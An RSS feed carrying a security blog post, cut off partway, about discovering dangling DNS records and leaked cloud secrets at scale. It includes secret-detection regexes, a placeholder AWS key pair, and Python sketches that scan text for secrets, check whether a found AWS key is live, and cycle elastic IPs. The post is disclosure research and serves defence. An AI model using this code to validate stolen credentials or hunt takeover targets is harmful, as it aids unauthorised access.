<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Bill Demirkapi's Blog]]></title><description><![CDATA[The adventures of a 24-year-old security researcher.]]></description><link>https://billdemirkapi.me/</link><image><url>https://billdemirkapi.me/favicon.png</url><title>Bill Demirkapi&apos;s Blog</title><link>https://billdemirkapi.me/</link></image><generator>Ghost 4.4</generator><lastBuildDate>Thu, 16 Apr 2026 20:42:33 GMT</lastBuildDate><atom:link href="https://billdemirkapi.me/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale]]></title><description><![CDATA[Modern technologies like the cloud have made rapidly developing scalable software more accessible than ever. What risks has cloud computing introduced for the sake of convenience?]]></description><link>https://billdemirkapi.me/leveraging-big-data-for-vulnerability-discovery-at-scale/</link><guid isPermaLink="false">66f4d85cf9f45803a6f6f96c</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 27 Sep 2024 05:19:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2024/09/blogpresentation_banner3.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2024/09/blogpresentation_banner3.png" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale"><p><em><strong>Disclaimer:</strong> This research was conducted strictly independent of my employer (excluded from scope). All opinions and views in this article are my own. 
When citing, please call me an Independent Security Researcher.</em></p><p>Modern technologies like the cloud have made rapidly developing scalable software more accessible than ever. What used to require thousands of dollars in investment is now accessible through a free trial. We&apos;ve optimized infrastructure-as-a-service (IaaS) providers to reduce friction to entry, but what happens when security clashes with productivity? What risks have we introduced for the sake of convenience?</p><p>For the last three years, I&apos;ve investigated how the insecure defaults built into cloud services have led to widespread &amp; systemic weaknesses in tens of thousands of organizations, including some of the world&apos;s largest like Samsung, CrowdStrike, NVIDIA, HP, Google, Amazon, the NY Times, and more! I focused on two categories: <a href="https://www.paloaltonetworks.com/cyberpedia/what-is-a-dangling-dns">dangling DNS records</a> and <a href="https://www.synopsys.com/blogs/software-security/finding-hard-coded-secrets-before-you-suffer-a-breach.html">hardcoded secrets</a>. The former is well-traversed and will be an intuitive introduction to finding bugs using unconventional data sources. 
Work towards the latter, however, has often been limited in scope &amp; diversity.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2024/09/b4a75f9f54200bc8ebcd3f47d19cd28c5dc7fce2.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1287" height="804" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/b4a75f9f54200bc8ebcd3f47d19cd28c5dc7fce2.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/b4a75f9f54200bc8ebcd3f47d19cd28c5dc7fce2.png 1000w, https://billdemirkapi.me/content/images/2024/09/b4a75f9f54200bc8ebcd3f47d19cd28c5dc7fce2.png 1287w" sizes="(min-width: 720px) 720px"><figcaption>Fake Article Demonstration on a New York Times Domain</figcaption></figure><p>Unfortunately, both vulnerability classes run rampant in production cloud environments. Dangling DNS records occur when a website has a DNS record pointing at a cloud host that is no longer under the owner&apos;s control. This project applied a variant of historical approaches to discover <strong>66,000+ unique top-level domains</strong> (TLDs) that still host dangling records. Leveraging a similar &quot;big data&quot; approach for hardcoded secrets revealed <strong>15,000+ unique, verified secrets</strong> for various API services.</p><p>While we will review the findings later, the key idea is simple: cloud providers are not doing enough to protect customers against misconfigurations <em>they incentivize</em>. The customer creates these vulnerabilities, but how platforms are designed directly controls whether such issues can exist at all.</p><p>Instead of taking accountability and enforcing secure defaults, most providers expect a few documentation warnings, which most customers will never read, to mitigate their liability.
This research demonstrates that such warnings are far from enough, and how the risk of abuse compounds when hardcoded secrets are involved.</p><h1 id="background">Background</h1><p>Cloud computing lets you create infrastructure on demand, including servers, websites, storage, and so on. Under the hood, cloud services are just an abstracted version of what many internet-facing businesses had to do a few decades ago. What makes it work are high margins and, more importantly, the fact that <strong>everything is shared</strong>.</p><h2 id="cloud-environments-network-identifiers">Cloud Environments &amp; Network Identifiers</h2><p>A cloud resource is <strong>dangling</strong> if it is deallocated from your environment while still referenced by a DNS record. For example, let&apos;s say I create an AWS EC2 instance and an A record, <code>project1.example.com</code>, pointing at its public IP. I use the subdomain for some projects and, a few months later, deallocate the EC2 instance while cleaning up old servers I&apos;m not using.</p><p>Remember, you paid to borrow someone else&apos;s infrastructure. Once you&apos;re done, the IP address assigned to your EC2 instance simply goes back into the shared pool for use by any other customer. Since DNS records are not bound to their targets by default, unless you remember that <code>project1.example.com</code> needs to be deleted, the moment the public IP is released is the moment it is <strong>dangling</strong>. These DNS records are problematic because if an attacker can capture the IP you released, they can now host anything at <code>project1.example.com</code>.</p><p>A/AAAA records are not the only type at risk. A* records are relevant when your cloud resource is assigned a dedicated IP address. Not all managed cloud services involve a dedicated IP, however. For example, when using a managed storage service like AWS S3 or Google Cloud (GCP) Storage, you&apos;re assigned a dedicated hostname like <code>example.s3.amazonaws.com</code>.
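</p><p>To make the &quot;dedicated vs. shared&quot; distinction concrete, here&apos;s a minimal Python sketch that labels what a DNS record points at. The suffix list is an illustrative subset I chose for this example, not an exhaustive one:</p><pre><code>def classify_target(record_type, target):
    """Label a DNS record target as a dedicated IP or a shared hostname."""
    # Illustrative subset of provider-managed (shared) endpoint suffixes.
    shared_suffixes = (
        ".s3.amazonaws.com",        # AWS S3 bucket hostnames
        ".storage.googleapis.com",  # GCP Storage hostnames
        ".azurewebsites.net",       # Azure App Service hostnames
    )
    if record_type in ("A", "AAAA"):
        return "dedicated"  # an IP the customer held exclusively
    if record_type == "CNAME" and target.lower().rstrip(".").endswith(shared_suffixes):
        return "shared"     # a provider-managed endpoint shared across customers
    return "unknown"
</code></pre><p>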
Under the hood, these hostnames point at IP addresses shared across many customers.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927140814.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="914" height="576" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927140814.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927140814.png 914w" sizes="(min-width: 720px) 720px"><figcaption>CNAME Subdomain Takeover <a href="https://learn.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover">Example</a></figcaption></figure><p>DNS record types like CNAME, which accept hostnames, can similarly become dangling if the hostname is released (e.g., you delete a bucket, allowing an attacker to recreate it with the same name). Shared endpoints are easier to guard against attacks than dedicated endpoints because the provider can prohibit the registration of a deallocated identifier. Reserving IP addresses, however, is far less feasible.</p><h3 id="why-care">Why Care?</h3><p>Why should you care about dangling DNS records?
Unfortunately, if an attacker can control a trusted subdomain, there is a substantial risk of abuse:</p><ul><li>Enables phishing, scams, and malware distribution.</li><li>Session Hijacking via Cross-Site Scripting (XSS)<ul><li>If <code>example.com</code> does not restrict access to session cookies from subdomains, an attacker may be able to execute malicious JavaScript to impersonate a logged-in user.</li></ul></li><li>Context-specific impact, like&#x2026;<ul><li>Bypassing trusted hostname checks in software (e.g., when downloading updates).</li><li>Abusing brand trust &amp; reputation for misinformation.</li></ul></li></ul><p>According to RIPE&apos;s article, <em><a href="https://labs.ripe.net/author/haya-shulman/cloudy-with-a-chance-of-cyberattacks-dangling-resource-abuse-on-cloud-platforms/">Dangling Resource Abuse on Cloud Platforms</a></em>:</p><blockquote>The main abuse (75%) of hijacked, dangling resources is to generate traffic to adversarial services. The attackers target domains with established reputation and exploit that reputation to increase the ranking of their malicious content by search engines and as a result to generate page impressions to the content they control. The content is mostly gambling and other adult content.<br>...<br>The other categories of abuse included malware distribution, cookie theft and fraudulent certificates. Overall, we find that the hacking groups successfully attacked domains in 31% of the Fortune 500 companies and 25.4% of the Global 500 companies, some over long periods of time.</blockquote><p>Dangling DNS records are most commonly exploited en masse, but targeted attacks still exist. Fortunately, to achieve a high impact beyond trivial search engine optimization, an attacker would need to investigate your organization&apos;s relationship with the domain they&apos;ve compromised.
Unfortunately, while trivial abuse like search engine optimization matters less in isolated incidents, it becomes a major problem when scaled.</p><h2 id="cloud-environments-authentication">Cloud Environments &amp; Authentication</h2><p>Cloud environments, including any API service, are managed over the Internet. Even if you use dedicated resources where possible, you&apos;re still forced to manage them through a shared gateway. How do we secure this access?</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/aws_access_key_docs.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1050" height="374" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/aws_access_key_docs.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/aws_access_key_docs.png 1000w, https://billdemirkapi.me/content/images/2024/09/aws_access_key_docs.png 1050w" sizes="(min-width: 720px) 720px"></figure><p>Since the inception of cloud services, one of the most common methods of authentication has been a 16- to 256-character secret key. For example, <a href="https://web.archive.org/web/20220930042626/https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html">until late 2022</a>, the recommended authentication scheme for AWS programmatic access was an access and secret key pair.</p><pre><code>[example]
aws_access_key_id = AKIAIBJGN829BTALSORQ
aws_secret_access_key = dGhlcmUgYXJlIGltcG9zdGVycyBhbW9uZyB1cw
</code></pre><p>While AWS today <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html">warns</a> against long-lived secret keys, you still need them to issue short-lived session tokens when running outside of an AWS instance. Also, it&apos;s still the path of least resistance.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/gcloud_access_methods.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="844" height="362" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/gcloud_access_methods.png 600w, https://billdemirkapi.me/content/images/2024/09/gcloud_access_methods.png 844w" sizes="(min-width: 720px) 720px"></figure><p>An alternative example is Google Cloud (GCP).</p><ul><li><strong>gcloud CLI credentials</strong>: Trigger an interactive login in a web browser to authenticate. Credentials <strong>cannot</strong> be hardcoded into source.</li><li><strong>Application Default Credentials</strong>: Look for cached credentials stored on disk, in environment variables, or an attached service account. Credentials <strong>cannot</strong> be hardcoded into source.</li><li><strong>Impersonated Service Account</strong>: Authenticate using a JSON file with a private key &amp; metadata for a service account. Technically, you <strong>can</strong> hardcode it in a string and load it manually, but the <a href="https://cloud.google.com/docs/authentication/rest#impersonated-sa">default</a> is to load it from a file.</li><li><strong>Metadata Server</strong>: API exposed to GCP instances. Allows you to request an access token if a service account is assigned to the resource. Credentials <strong>cannot</strong> be hardcoded into source.</li></ul><p>While GCP also has API keys, these are only supported for benign services like Google Maps because they do not &quot;identify a principal&quot; (i.e., a user).
The closest they have to a secret you can hardcode, like AWS access/secret keys, are <a href="https://cloud.google.com/iam/docs/keys-create-delete">service account JSON files</a>.</p><pre><code>{
  &quot;type&quot;: &quot;service_account&quot;,
  &quot;project_id&quot;: &quot;project-id-REDACTED&quot;,
  &quot;private_key_id&quot;: &quot;0dfREDACTED&quot;,
  &quot;private_key&quot;: &quot;-----BEGIN PRIVATE KEY-----\nMIIEvwREDACTED\n-----END PRIVATE KEY-----\n&quot;,
  &quot;client_email&quot;: &quot;REDACTED@project-id-REDACTED.iam.gserviceaccount.com&quot;,
  &quot;client_id&quot;: &quot;106REDACTED...&quot;,
  &quot;auth_uri&quot;: &quot;https://accounts.google.com/o/oauth2/auth&quot;,
  &quot;token_uri&quot;: &quot;https://oauth2.googleapis.com/token&quot;,
  &quot;auth_provider_x509_cert_url&quot;: &quot;https://www.googleapis.com/oauth2/v1/certs&quot;,
  &quot;client_x509_cert_url&quot;: &quot;https://www.googleapis.com/robot/v1/metadata/x509/REDACTED%40project-id-REDACTED.iam.gserviceaccount.com&quot;,
  &quot;universe_domain&quot;: &quot;googleapis.com&quot;
}
</code></pre><p>Unlike a short secret, Google embeds a full size RSA 2048 private key in PEM format. While you could still hardcode this, there is an important distinction in how GCP and AWS approached short-lived secrets. Google incorporated strong defaults in their design, not just in their documentation.</p><ul><li>GCP service account keys are stored in a file by default. AWS access and secret keys were not designed to be used from a file.</li><li>GCP <a href="https://googleapis.dev/python/google-auth/latest/user-guide.html">client libraries expect</a> service account keys to be used from a file. AWS client libraries <a href="https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html">universally accept</a> access and secret keys from a string.</li><li>It is more annoying to hardcode a 2,000+ character JSON blob than it is to hardcode a 20-character access and 40-character secret key.</li></ul><p>We&apos;ll dissect these differences later, but the takeaway here is <strong>not</strong> that AWS is fundamentally less secure than GCP. AWS&apos; path of least resistance being insecure only matters at scale. If you follow AWS recommendations, your security posture is likely close to that of a GCP service account. At scale, however, it is inevitable that some customers will follow where the incentives lead them. In AWS&apos; case, that&apos;s hardcoding long-lived access and secret keys in production code. GCP&apos;s layered approach <em>reduces</em> this risk of human error by <strong>making it annoying to be insecure</strong>.</p><h3 id="why-care-1">Why Care?</h3><p>Unfortunately, hardcoded secrets can lead to far worse impact than dangling DNS records because, by default, they have little restriction on who can use them.</p><p>By their very nature, secrets are &quot;secret&quot; for a reason. They&apos;re designed to grant privileged access to cloud services like production servers, databases, and storage buckets. 
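</p><p>To make that concrete, a candidate AWS key pair can be checked for validity without touching a single resource, because STS <code>GetCallerIdentity</code> requires no permissions. Here&apos;s a minimal sketch, assuming boto3; the <code>sts_client</code> parameter is an illustrative seam I added so the logic can be exercised without network access:</p><pre><code>def verify_aws_key(access_key_id, secret_access_key, sts_client=None):
    """Return the caller's ARN if the key pair is live, otherwise None."""
    if sts_client is None:
        # Real path: requires boto3 and network access.
        import boto3
        sts_client = boto3.client(
            "sts",
            aws_access_key_id=access_key_id,
            aws_secret_access_key=secret_access_key,
        )
    try:
        # GetCallerIdentity needs no permissions, so any live key answers.
        return sts_client.get_caller_identity()["Arn"]
    except Exception:
        return None  # invalid, revoked, or unreachable
</code></pre><p>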
Cloud provider keys could let an attacker access and modify your infrastructure, potentially exposing sensitive user data. A leaked Slack token could let an attacker <a href="https://www.theverge.com/2024/7/16/24199545/disney-hacktivists-1tb-leak-internal-slack-communications-ai">read all internal communication in your organization</a>. While impact still varies with context, secrets are much easier to abuse and often lead to an immediate security impact. We&apos;ll further demonstrate what this looks like when we review findings.</p><h2 id="past-work">Past Work</h2><p>This blog is not intended to serve as a thorough literature review of all past work regarding dangling domains and hardcoded secrets, but let&apos;s review a few key highlights.</p><h3 id="dangling-domains">Dangling Domains</h3><p>Dangling DNS records are a common problem that has been discussed for at least a decade.</p><p>One of the first works pivotal to our understanding of the bug class was published in 2015 by <a href="https://x.com/iammandatory">Matt Bryant</a>, <a href="https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains">Fishing the AWS IP Pool for Dangling Domains</a>.
This project explored dangling DNS records that point at a dedicated endpoint, like an AWS EC2 public IP (vs a hostname for a shared endpoint, like <code>*.s3.amazonaws.com</code>).</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/fishing_aws_ip_pool_snippet.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="985" height="208" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/fishing_aws_ip_pool_snippet.png 600w, https://billdemirkapi.me/content/images/2024/09/fishing_aws_ip_pool_snippet.png 985w" sizes="(min-width: 720px) 720px"></figure><p>Bryant found that he could continuously allocate and release AWS <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html">elastic IPs</a> to enumerate the shared customer pool. Why is this important? To exploit a dangling DNS record, an attacker needs to somehow control its target, e.g., the EC2 IP that was previously allocated/released by the victim. While enumerating these IPs, Bryant searched Bing using the <code>ip:</code> search operator to see if any cached domains pointed at each one.
This effectively allowed Bryant to look for dangling DNS records without a specific target.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/aws_elastic_ips_small_pool.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1408" height="244" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/aws_elastic_ips_small_pool.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/aws_elastic_ips_small_pool.png 1000w, https://billdemirkapi.me/content/images/2024/09/aws_elastic_ips_small_pool.png 1408w" sizes="(min-width: 720px) 720px"></figure><p>A few years later, AWS implemented a mitigation that restricts accounts to a small pool of IPs, instead of the entire shared address space. For example, if you allocate, free, and reallocate an elastic IP today, you&apos;ll notice that you&apos;ll keep getting the same IPs over and over again. This prevents enumeration of the AWS IP pool using standard elastic IP allocation. 
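</p><p>For reference, Bryant&apos;s allocate-and-release loop boils down to two API calls per round. Below is a sketch using boto3-style calls; <code>ec2</code> is any object exposing <code>allocate_address</code>/<code>release_address</code>, and against today&apos;s AWS the loop would simply cycle through your account&apos;s small pool:</p><pre><code>def sample_ip_pool(ec2, rounds=100):
    """Allocate and immediately release elastic IPs, recording each unique IP."""
    seen = set()
    for _ in range(rounds):
        addr = ec2.allocate_address(Domain="vpc")
        seen.add(addr["PublicIp"])
        # Release right away so each IP is only held for a moment.
        ec2.release_address(AllocationId=addr["AllocationId"])
    return seen
</code></pre><p>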
Google Cloud has a very similar mitigation to deter dangling record abuse, but it extends the &quot;small account pool&quot; to apply to any component that allocates an IP.</p><p>Besides dangling records that point at a generic cloud IP, more recent work into &quot;hosting-based&quot; records (e.g., CNAME to a hostname, aka &quot;shared&quot; endpoint) includes <a href="https://indico.dns-oarc.net/event/46/contributions/982/attachments/933/1740/oarc40_li_dareshark.pdf">DareShark: Detecting and Measuring Security Risks of Hosting-Based Dangling Domains</a>.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/dareshark.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1017" height="182" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/dareshark.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/dareshark.png 1000w, https://billdemirkapi.me/content/images/2024/09/dareshark.png 1017w" sizes="(min-width: 720px) 720px"></figure><p>Researchers from Tsinghua University used DNS databases to identify records that point at &quot;service endpoints&quot;, like <code>example.s3.amazonaws.com</code>. Next, they check whether the identifier is registered (i.e., does the <code>example</code> S3 bucket exist?). If it is not, and the managed service is &quot;vulnerable&quot;, they can register the identifier under their attacker account and hijack the record! Whether a service is vulnerable varies. For example, some providers require proof of ownership (like a TXT record) or disallow registering identifiers that were previously held by another customer.</p><p>There are <strong>a lot</strong> of other projects against dangling DNS records we won&apos;t review for brevity. While the space is well traversed, there are some limitations of historical approaches.
In general, past work usually runs into at least one of the following:</p><!--kg-card-begin: markdown--><ul>
<li>Use of a limited data source to identify what domains point at a given IP/hostname.</li>
<li>Focus is exclusively on DNS records pointing at IPs (dedicated endpoints) or hostnames (shared endpoints); it is rare to see both at once.</li>
<li>Extremely limited work into defeating modern deterrents.
<ul>
<li>For example, many dangling DNS records that point at a shared endpoint are not actually exploitable because of provider restrictions like proof of domain ownership.</li>
<li>Some large providers have seen almost no research into exploiting records that point at a dedicated endpoint, like a generic IP address, due to mitigations like a small pool of IPs assigned to your account. For instance, work into Google Cloud has been limited to shared hostnames.</li>
</ul>
</li>
</ul>
<!--kg-card-end: markdown--><p>Later, we&apos;ll use dangling records as an example of how you can apply unconventional data sources to find vulnerabilities at scale. Additionally, as we&apos;ll soon see, I also attempted to avoid these common pitfalls. With that said, let&apos;s move on to hardcoded secrets!</p><h3 id="hardcoded-secrets">Hardcoded Secrets</h3><p>Unlike dangling DNS records, work into hardcoded secrets was a lot more limited than I expected. In general, research into this category falls into two camps:</p><!--kg-card-begin: markdown--><ul>
<li>Tools to search files and folders for secret patterns.</li>
<li>Projects that search public code uploaded to source control providers, like GitHub, for secret patterns.</li>
</ul>
<!--kg-card-end: markdown--><p>There are dozens of trivial examples of the former, including <a href="https://github.com/zricethezav/gitleaks">Gitleaks</a>, <a href="https://github.com/awslabs/git-secrets">Git-secrets</a>, and <a href="https://github.com/trufflesecurity/trufflehog">TruffleHog</a>. These tools listen for new Git commits, or are run ad hoc against existing data, like the contents of a Git repository, S3 bucket, Docker image, and so on.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/image.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1072" height="436" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/image.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/image.png 1000w, https://billdemirkapi.me/content/images/2024/09/image.png 1072w" sizes="(min-width: 720px) 720px"></figure><p>Nearly all secret scanning tools work by looking for regex patterns associated with various secrets. For example, some providers include a unique identifier in their API keys that makes accurate identification trivial, e.g., long-term AWS user access keys start with <code>AKIA</code>.
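</p><p>As a toy illustration of the approach, a scanner needs little more than a table of patterns and a loop. The two patterns below are a small subset I picked for demonstration; real tools ship hundreds:</p><pre><code>import re

# Illustrative subset; real scanners maintain hundreds of these patterns.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}

def scan_text(text):
    """Return (label, match) pairs for every candidate secret in the text."""
    hits = []
    for label, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((label, match.group()))
    return hits
</code></pre><p>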
You can see this in the example regex patterns <a href="https://github.com/h33tlit/secret-regex-list">above</a>, such as <code>AKIA[0-9A-Z]{16}</code>.</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927010240.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="946" height="255" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/Pasted-image-20240927010240.png 600w, https://billdemirkapi.me/content/images/2024/09/Pasted-image-20240927010240.png 946w" sizes="(min-width: 720px) 720px"></figure><p>Moving on from self-managed tooling, some source control platforms, <a href="https://github.blog/engineering/behind-the-scenes-of-github-token-scanning/">particularly GitHub</a>, proactively scan for secrets in all public data/code. In fact, GitHub goes a step beyond identifying a <em>potential</em> secret by <a href="https://docs.github.com/en/code-security/secret-scanning/introduction/supported-secret-scanning-patterns#supported-secrets">partnering with several large cloud providers</a> to verify <strong>and revoke</strong> leaked secrets! This is pretty neat because it can prevent abuse before the customer can take action.</p><p>In general, all work into hardcoded secrets faces the same problem: it&apos;s against a data set limited in scope and diversity. Even GitHub&apos;s secret scanning work, one of the largest projects of its kind to date, only has visibility into a small fraction of leaked secrets. For example, most closed source applications will likely never encounter GitHub&apos;s scanning. 
Other tools like <a href="https://github.com/trufflesecurity/trufflehog">TruffleHog</a> are better at accepting a diverse set of file formats, but lack a large, diverse source of those files.</p><p>How can we do better?</p><h1 id="shifting-our-perspective">Shifting Our Perspective</h1><h2 id="traditional-discovery-mindset">Traditional Discovery Mindset</h2><p>When we consider the conventional approaches to vulnerability discovery, be it in software or websites, we tend to confine ourselves to a specific target or platform. In the case of software, we might reverse engineer an application&apos;s attack surfaces for untrusted input, aiming to trigger edge cases. For websites, we might enumerate a domain for related assets and seek out unpatched, less defended, or occasionally abandoned resources.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://billdemirkapi.me/content/images/2024/09/common_dangling_discovery_methodology.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1200" height="476" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/common_dangling_discovery_methodology.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/common_dangling_discovery_methodology.png 1000w, https://billdemirkapi.me/content/images/2024/09/common_dangling_discovery_methodology.png 1200w" sizes="(min-width: 720px) 720px"><figcaption>Common Dangling Domain Takeover Flow</figcaption></figure><p>To be fair, this thinking is an intuitive default. For example, when was the last time you read a blog about how to find privilege escalation vulnerabilities at scale? They exist, but unsurprisingly, the industry is biased towards hunting vulnerabilities in individual targets (myself included!). This is the result of simple incentives. It&apos;s way easier to hunt for vulnerabilities at a micro level, particularly complex types like software privilege escalation.
Monetary incentives like bug bounty are also target-oriented.</p><p>Admittedly, automatically identifying software vulnerabilities is extremely challenging. What I&apos;ve noticed with cloud vulnerabilities is that they&apos;re not only easier to comprehend, but they also tend to lead to a much larger impact. Why? Remember: in the cloud, <strong>everything is shared</strong>! I can remotely execute code in a software application? Cool, I can now pop a single victim if I meet a laundry list of other requirements like network access or user interaction. I can execute code in a cloud provider? Chances are, the bug impacts more than one customer.</p><h3 id="should-some-vulnerabilities-be-approached-differently">Should Some Vulnerabilities Be Approached Differently?</h3><p>The industry lacks focus on finding bugs at scale; it&apos;s a common pattern across most security research. Can we shift our perspective away from a specific target?</p><!--kg-card-begin: html--><style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;background: none !important;}
.tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
  overflow:hidden;padding:10px 5px;word-break:normal;}
.tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
  font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}
.tg .tg-fymr{border-color:inherit;font-weight:bold;text-align:left;vertical-align:top}
.tg .tg-0pky{border-color:inherit;text-align:left;vertical-align:top}
</style>
<table class="tg"><thead>
  <tr>
    <th class="tg-fymr">Perspective</th>
    <th class="tg-fymr">Dangling Resources</th>
  </tr></thead>
<tbody>
  <tr>
    <td class="tg-0pky">Traditional</td>
    <td class="tg-0pky">Start with a target and capture vulnerable assets.</td>
  </tr>
  <tr>
    <td class="tg-0pky">At Scale</td>
    <td class="tg-0pky">Capture first &amp; identify impact with &#x201C;big data&#x201D;.</td>
  </tr>
</tbody>
</table><!--kg-card-end: html--><p>With dangling DNS records, the &quot;traditional&quot; approach is to enumerate a target for subdomains and only then identify vulnerable records. Fortunately, dangling DNS records are one of the few vulnerability classes we&apos;ve been able to identify at scale.</p><p>For example, we previously discussed <a href="https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains">Matt Bryant&apos;s blog about finding records that point at deallocated AWS IPs</a>. Instead of starting with a target, Bryant enumerates potential vulnerabilities: the shared pool of available AWS IPs, many of which were likely assigned to another customer at some point. Bryant worked backwards. What DNS records point at the IP I allocated in my AWS environment? If any exist, I know for a fact that they are dangling, because I control the target!</p><p>Bryant&apos;s methodology had other problems, like a limited source of DNS data (e.g., Bing&apos;s <code>ip:</code> search filter), but the key takeaways are simple.</p><ol><li>Many vulnerability classes are trivial to identify, but are subject to our unconscious bias to start with a specific target.</li><li>There is a large gap in using non-traditional data sources to identify these issues at scale.</li></ol><p>For example, the two perspectives for leaked secrets include:</p><!--kg-card-begin: html--><style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;background: none !important;}
.tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
  overflow:hidden;padding:10px 5px;word-break:normal;}
.tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px;
  font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;}
.tg .tg-fymr{border-color:inherit;font-weight:bold;text-align:left;vertical-align:top}
.tg .tg-0pky{border-color:inherit;text-align:left;vertical-align:top}
</style>
<table class="tg"><thead>
  <tr>
    <th class="tg-fymr">Perspective</th>
    <th class="tg-fymr">Leaked Secrets</th>
  </tr></thead>
<tbody>
  <tr>
    <td class="tg-0pky">Traditional</td>
    <td class="tg-0pky">Scan a limited scope for secret patterns.</td>
  </tr>
  <tr>
    <td class="tg-0pky">At Scale</td>
    <td class="tg-0pky">Find diverse &#x201C;big data&#x201D; sources with no target restriction.</td>
  </tr>
</tbody>
</table><!--kg-card-end: html--><p>Today, most work toward identifying leaked cloud credentials focuses on individual targets or lacks diversity (e.g., GitHub secret scanning). To identify dangling DNS vulnerabilities at scale, we start with the records, not a target. We do this by using &quot;big data&quot; sources of DNS intelligence, e.g., the capability to figure out what records point at an IP.</p><p>Are there similar &quot;big data&quot; sources that would let us identify leaked secrets at scale without starting with a limited scope?</p><h2 id="the-security-at-scale-mindset">The Security at Scale Mindset</h2><ul><li>Start with the vulnerability, not the target.</li><li>Work backwards using creative data sources.</li><li>The data source must contain relationships indicative of the targeted vulnerability class.</li><li>It must be feasible to search that data at scale.</li></ul><h3 id="reverse-the-process-dangling-resources">Reverse the Process: Dangling Resources</h3><p>A DNS record is dangling if it points at a deallocated resource. The ideal data source must include a large volume of DNS records. While we covered Bing as an example, are there better alternatives?</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2024/09/b30434215f0b5561b441265bc812541efc4cee06.png" class="kg-image" alt="Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale" loading="lazy" width="1036" height="374" srcset="https://billdemirkapi.me/content/images/size/w600/2024/09/b30434215f0b5561b441265bc812541efc4cee06.png 600w, https://billdemirkapi.me/content/images/size/w1000/2024/09/b30434215f0b5561b441265bc812541efc4cee06.png 1000w, https://billdemirkapi.me/content/images/2024/09/b30434215f0b5561b441265bc812541efc4cee06.png 1036w" 